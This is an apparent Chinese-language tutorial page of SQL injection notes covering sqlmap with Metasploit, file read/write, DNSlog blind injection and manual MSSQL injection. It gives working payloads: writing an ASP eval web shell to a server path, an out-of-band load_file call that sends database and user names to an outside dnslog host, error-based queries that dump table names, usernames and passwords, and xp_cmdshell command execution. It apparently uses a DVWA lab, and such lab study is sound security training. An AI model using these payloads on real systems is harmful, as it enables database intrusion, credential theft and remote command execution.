10 29 SQLMAP綜合運用

2022-09-02 07:18:07 字數 3909 閱讀 9478

sqlmap與

msf結合使用

sqlmap -u 目標

url -p name --dbms mysql --os-pwn --msf-path /usr/share/metasploit-framework

(metasploit

位置)sqlmap結合

bs的使用

step1:開啟

bp的日誌記錄功能,並儲存到桌面中

step2:開啟瀏覽器中**並設定

bp中**開關為「

intercept is off

」step3:

step4:開啟

sqlmap

測試,python sqlmap.py -i c:\user.....\log.txt -batch

-l 表示從檔案讀取

請求,測試完之後的結果生成乙個

.csv

格式的檔案

通過sqlmap 讀寫檔案

-–file-read=rfile 

從後端的資料庫管理系統檔案系統讀取檔案

(物理路徑)

-–file-write=wfile 

編輯後端的資料庫管理系統檔案系統上的本地檔案

(mssql xp_shell)-–

file-dest=dfile 

後端的資料庫管理系統寫入檔案的絕對路徑

python sqlmap.py -u "" --file-read="g:\phpstudy\www\t1.txt"

python sqlmap.py -u "" --file-dest="g:\\phpstudy\\www\\result.txt" --file-write="c:\\test.txt"

c:\\test.txt  <% eval request("cmd") %>  

python sqlmap.py -u "target_url" --file-dest="/var/www/shell.php" --file-write="c:\\test.txt"

使用dvwa中的測試

dnslog

在盲注中的應用

step1:測試注入點,判斷列數

dnslog

提供的url

是否解析

注意**的響應時間,一般較長,表示可以解析

step3:使用

concat

拼接url

和sql

語句'\\\\',(select user()),'test.zy1ph7pdmh.......\\aaa')),2%23&submit=submit#

接下來只要將select user()更換

1』 and if((select load_file(concat(『\\\\』,(select database()),』.zy1ph7pdmh.......\\abc』)))1,0)

mssql手工注入

step1:尋找注入位置

step2:判斷資料庫型別

select *from sysobjects(

sysobjects

系統物件表,儲存當前資料庫的物件)

select*from users where id=1 and exits(select * from sysobjects)

and exits(select * from sysobjects)--  有結果則說明後天資料是

mssql

還有其他方法:常用框架組合方法asp+mssql/頁面報錯資訊

step3:

select is_srvrolemember('sysadmin'); 判斷當前是否為

saselect is_srvrolemember('db_owner'); 判斷當前使用者寫檔案、讀檔案的許可權(

db_owner

)select is_srvrolemember('public');判斷是否有

public

許可權,可以爆破表

step4:

當前使用者:user    and (user)=1--

資料庫版本:select db_name()

' and (select db_name())=1 --

' and (convert(int,db_name()))=1 --

當前資料庫:

select db_name(0) 當前資料庫,其中的引數表示第幾個資料庫

所有的資料庫:' and (convert(int,db_name(2)))=1-- //變換其中資料可以爆出所有的資料庫名稱(方法1)

select top 1 name from master..sysdatabases where name not in ('master','aspcms');(方法2)

select top 1 name from master..sysdatabases在系統資料庫中能夠查詢所有的資料庫

where name not in ('master','aspcms')表示查詢的結果不在括號中的集合裡

and (select top 1 name from master..sysdatabases)=1--

and (select top 10 name from master..sysdatabases)

step5:當前資料庫中表

select top 1 name from test.sys.all_objects where type=』u』 and is_ms_shipped=0  獲取第一表名

' and (select top 1 name from test.sys.all_objects where type=』u』 and is_ms_shipped=0)=1--

step6:獲取指定表的欄位名

select top 1 column_name from test.information_schema.columns where table_name=』users』

' and (select top 1 column_name from test.information_schema.columns where table_name=』users』)=1--

' and (select top 1 column_name from test.information_schema.columns where table_name=』users』 and column_name not in (『id』))=1--   //username出來了

' and (select top 1 column_name from test.information_schema.columns where table_name=』users』 and column_name not in (『id』,』username』))=1--   //password出來了

step7:獲取字段資料

select top 1 username from users

select top 1 password from users

' and (select top 1 password from users)=1--

解密資料,登入後台

mssql的

xp_cmdshell

擴充套件判斷當前mssql資料庫是否有

xp_cmdshell

擴充套件select count(*) from master. dbo.sysobjects where xtype ='x' and name = 'xp_cmdshell'

' and (select count(*) from master. dbo.sysobjects where xtype ='x' and name = 'xp_cmdshell'

)=1--返回

1 說明有;返回

0 說明沒有。

exec master..xp_cmdshell 『whoami』     執行xp_cmdshell外掛程式執行』whoami』

MGRE GRE PPP協議綜合運用

1.拿到拓撲圖,我們先看第乙個要求,r5是isp,isp是網路服務運營商,不能被通告進路由協議,所以在配置時,要寫一條靜態預設,指向isp 2.從拓撲圖我們可以看出,在實驗前需要先加2sa板卡,連線成串線 3.在完成前兩步後,開始進行配置,先配置直連路由,配置完成後,在配置各種要求 4.最後使用靜態...

Flutter form表單綜合運用

老規矩,看圖 一 效果圖 以下 複製進main.dart檔案即可執行 二 實現 import package flutter material.dart override widget build buildcontext context class formdemopage extends sta...

L6 11 綜合運用

本單元我們學習了模組知識,學習了常用的模組如 時間模組math,時間模組time和datetime,隨機模組random等,本節課我們將系統的去運用所學知識,完成一些 程式。猜拳又稱為划拳,在面對一些小事情,我們總是通過猜拳來決定。學習了模組後,我們可以模擬和電腦玩剪刀石頭布的遊戲。分析題目 玩家和...